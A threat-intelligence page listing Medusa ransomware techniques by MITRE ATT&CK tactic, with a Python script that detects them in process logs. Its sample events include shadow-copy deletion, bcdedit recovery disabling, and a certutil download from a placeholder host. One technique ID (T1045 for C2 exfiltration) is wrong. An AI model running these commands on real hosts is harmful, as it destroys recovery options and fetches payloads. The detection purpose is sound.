Tactics, Techniques and Procedures for Medusa




The matrix below groups the observed techniques by MITRE ATT&CK tactic.

Initial Access (TA0001)
  Valid Accounts (T1078): Initial access through brute force or compromised credentials of legitimate RDP accounts.
  Phishing (T1566): Initial access through phishing email attachments.
  External Remote Services (T1133): Accesses the victim's network via an exposed RDP service.

Execution (TA0002)
  Command and Scripting Interpreter (T1059): Uses a series of Windows commands, such as bcdedit.exe and vssadmin.
  Windows Management Instrumentation (T1047): Uses a series of Windows commands, such as bcdedit.exe and vssadmin.

Defense Evasion (TA0005)
  Impair Defenses (T1562): Employs the Windows Management Instrumentation command-line utility (WMIC) to delete shadow copies.
  Disable or Modify Tools (T1562.001): Terminates services or processes related to antivirus/security tools.
  Safe Mode Boot (T1562.009): Abuses Safe Mode to evade endpoint detection.

Credential Access (TA0006)
  Brute Force (T1110): Uses brute force on local RDP account passwords.

Discovery (TA0007)
  File and Directory Discovery (T1083): Queries specified files, folders, and file extensions.
  Network Share Discovery (T1135): Enumerates network shares.

Lateral Movement (TA0008)
  Remote Services (T1021): Uses remote services for login and lateral movement via RDP and SMB.

Exfiltration (TA0010)
  Exfiltration Over C2 Channel (T1045): Transfers data to attacker-controlled servers via an existing command-and-control (C2) channel.
  Exfiltration Over Web Service (T1567): Exfiltrates data using web services such as cloud storage (e.g., Google Drive, Dropbox).
  Exfiltration Over Alternative Protocol (T1048): Exfiltrates data using alternative protocols, such as FTP/SFTP, to avoid detection by traditional methods.

Command and Control (TA0011)
  Ingress Tool Transfer (T1105): Uses certutil to download malicious files.

Impact (TA0040)
  Inhibit System Recovery (T1490): Deletes shadow copies and disables the Windows System Restore feature.
  Service Stop (T1489): Terminates processes and services related to database servers, email servers, and backups.
  Data Encrypted for Impact (T1486): Uses the AES-256 algorithm to encrypt files on the compromised host.
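The Execution, Defense Evasion, Command and Control and Impact entries above all name built-in Windows utilities (vssadmin, wmic, bcdedit, certutil, service stops), which makes them good candidates for process-creation detection. The following is an added example, not code from Ransomware.live or Crocodyli: it matches a constructed, tab-separated process-creation log (timestamp, host, user, command line; all sample events are invented) against the techniques listed on this page, and then correlates recovery inhibition (T1490) with service stops (T1489) on the same host within a short window, since that pairing precedes encryption in the Impact column. The log format, rule set and window length are assumptions for the example.

```python
import re
from datetime import datetime, timedelta
from typing import NamedTuple

# Constructed sample process-creation events (tab separated: timestamp,
# host, user, command line). Invented for this example, not real telemetry.
SAMPLE_EVENTS = "\n".join([
    "2024-01-01T10:00:01Z\tWS01\tCORP\\alice\tC:\\Windows\\System32\\notepad.exe C:\\notes.txt",
    "2024-01-01T10:02:13Z\tWS01\tCORP\\alice\tvssadmin.exe delete shadows /all /quiet",
    "2024-01-01T10:02:20Z\tWS01\tCORP\\alice\twmic.exe shadowcopy delete",
    "2024-01-01T10:02:31Z\tWS01\tCORP\\alice\tbcdedit.exe /set {default} safeboot network",
    "2024-01-01T10:02:40Z\tWS01\tCORP\\alice\tbcdedit.exe /set {default} recoveryenabled no",
    "2024-01-01T10:03:02Z\tWS01\tCORP\\alice\tcertutil.exe -urlcache -split -f http://example.invalid/x.bin C:\\Users\\Public\\x.bin",
    "2024-01-01T10:03:10Z\tWS01\tCORP\\alice\tnet.exe stop MSSQLSERVER",
    "2024-01-01T10:04:00Z\tWS01\tCORP\\alice\tC:\\Program Files\\Git\\bin\\git.exe status",
])


class Rule(NamedTuple):
    technique: str       # ATT&CK ID as listed on the page
    name: str            # short description for the analyst
    pattern: re.Pattern  # matched against the process command line


# Assumed detection rules derived from the tools named in the matrix.
RULES = [
    Rule("T1490", "Inhibit System Recovery: vssadmin shadow copy deletion",
         re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
    Rule("T1047", "Windows Management Instrumentation: wmic shadow copy deletion",
         re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    Rule("T1562.009", "Safe Mode Boot: bcdedit sets the safeboot flag",
         re.compile(r"\bbcdedit(\.exe)?\b.*\bsafeboot\b", re.I)),
    Rule("T1490", "Inhibit System Recovery: bcdedit disables Windows recovery",
         re.compile(r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    Rule("T1105", "Ingress Tool Transfer: certutil URL download",
         re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b", re.I)),
    Rule("T1489", "Service Stop: service stopped from the command line",
         re.compile(r"\b(net1?|sc)(\.exe)?\s+stop\b", re.I)),
]


class Finding(NamedTuple):
    timestamp: str
    host: str
    user: str
    technique: str
    name: str
    command_line: str


def match_command_line(cmd: str) -> list:
    """Return every rule whose pattern matches the command line."""
    return [r for r in RULES if r.pattern.search(cmd)]


def scan_events(text: str) -> list:
    """Parse tab-separated events and return one Finding per matching rule.
    Malformed lines (wrong field count) are skipped rather than crashing the scan."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t", 3)
        if len(parts) != 4:
            continue
        ts, host, user, cmd = parts
        for rule in match_command_line(cmd):
            findings.append(Finding(ts, host, user, rule.technique, rule.name, cmd))
    return findings


def _parse_ts(ts: str) -> datetime:
    # fromisoformat() only accepts a trailing 'Z' on Python 3.11+, so normalise it.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def hosts_with_ransomware_precursors(findings: list, window_minutes: int = 10) -> list:
    """Hosts where recovery inhibition (T1490) and a service stop (T1489) occur
    within the window: a stronger pre-encryption signal than either alone."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, []).append(f)
    window = timedelta(minutes=window_minutes)
    flagged = set()
    for host, fs in by_host.items():
        recovery = [_parse_ts(f.timestamp) for f in fs if f.technique == "T1490"]
        stops = [_parse_ts(f.timestamp) for f in fs if f.technique == "T1489"]
        if any(abs(r - s) <= window for r in recovery for s in stops):
            flagged.add(host)
    return sorted(flagged)


if __name__ == "__main__":
    results = scan_events(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.timestamp} {f.host} {f.technique:<10} {f.name}")
    print("hosts with pre-encryption chain:", hosts_with_ransomware_precursors(results))
```

The per-rule matches are useful on their own, but the correlation function is the part worth tuning in a real deployment: individual hits on vssadmin or net stop are noisy on administrator workstations, whereas both within a few minutes on the same host is rarely benign.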

This information is provided by Crocodyli or Ransomware.live